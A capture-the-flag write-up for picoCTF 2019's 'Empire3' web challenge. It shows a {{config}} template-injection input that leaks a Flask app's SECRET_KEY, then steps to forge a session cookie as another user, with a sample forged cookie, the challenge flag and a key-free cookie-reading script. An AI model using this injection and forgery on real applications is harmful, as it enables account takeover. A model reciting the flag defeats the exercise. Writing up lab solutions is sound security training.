Empire3
Problem
Agent 513! One of your dastardly colleagues is laughing very sinisterly! Can you access his todo list and discover his nefarious plans? https://2019shell1.picoctf.com/problem/45132/ (link) or http://2019shell1.picoctf.com:45132
Solution
1. Create an account and sign in.
2. Use EditThisCookie to get the Flask session cookie.
3. Create a todo of {{config}} and get the Flask SECRET_KEY variable (used for encoding session cookies).
4. Paste SECRET_KEY into the secret_key variable of the attached script.
5. Paste the Flask cookie into the regular_user_cookie variable of the attached script.
6. Run the script to decode the cookie and paste the result into the cookie_dict variable.
7. Change "user_id": "x" to "user_id": "2".
8. Run the script again and change the cookie to the new cookie.
9. Reload the page and the flag should be given.
Example Output
Decoded Cookie:
{'_fresh': True, '_id': '669830bc929eb8755b468ad78734441992a8275815de8e86acaefc907af730c0f014a3c1aebb5c4f81924a9e400164894ab9f21fda058f1542b5d07c5cccc5a3', 'csrf_token': '86c56031ea9ab7555bb9e367a80f6a3bf72a1c59', 'user_id': '3'}
Encoded Cookie For User 2:
.eJwlzzFqBTEMBNC7uE4h2ZIt5TKLpJVICCSw-38VcvdvyHRTDLz5bUddeX-09_a4ntne2vF57jKnygAP7Zoui9lpip1L1iAiVO0mfbEgnykp08KyQmFZrQEBBUg2Ai3dOagEtZNpEgBOEiVzrY51GrAUMnXnE1Zw7LCNDYn7quPx85Xf2yMzeMLANDXfHHbXHHOZQE0bXqsbBuvePe-8_k_09vcCf5o-3g.XaOrlQ.dWJr-X0v22Dhdt0rswb0cvI3lMk
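The cookie layout behind the decode step, as an added example (this is not the attached script from the writeup): a standard-library reader showing that a Flask session cookie's payload can be read without any key, so the signature is the only thing protecting it. The function names, the sample session contents and the placeholder timestamp and signature are constructed for illustration.

```python
import base64
import json
import zlib

# Constructed sample session contents (not taken from the challenge).
SAMPLE = {"_fresh": True, "csrf_token": "constructed-token", "user_id": "3"}


def b64url_decode(segment):
    """Decode URL-safe base64 whose '=' padding was stripped."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def read_session_cookie(cookie):
    """Return the readable parts of a Flask session cookie.

    Layout: [.]payload.timestamp.signature, where a leading '.' marks a
    zlib-compressed payload. No key is used and nothing is verified.
    """
    compressed = cookie.startswith(".")
    parts = (cookie[1:] if compressed else cookie).split(".")
    if len(parts) != 3:
        raise ValueError("expected payload.timestamp.signature")
    payload, timestamp, signature = parts
    raw = b64url_decode(payload)
    if compressed:
        raw = zlib.decompress(raw)
    return {"compressed": compressed, "data": json.loads(raw),
            "timestamp": timestamp, "signature": signature}


def constructed_cookie(data, compress):
    """Build a sample cookie; timestamp and signature are placeholders."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    if compress:
        raw = zlib.compress(raw)
    payload = base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return ("." if compress else "") + payload + ".AAAAAA.placeholder_signature"


if __name__ == "__main__":
    for compress in (True, False):
        cookie = constructed_cookie(SAMPLE, compress)
        print(cookie)
        print(read_session_cookie(cookie)["data"])
```

Because the contents are only integrity-protected, nothing confidential belongs in the session, and a disclosed SECRET_KEY has to be rotated since every signature made with it stops meaning anything.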
Flag
picoCTF{cookies_are_a_sometimes_food_8038d44f}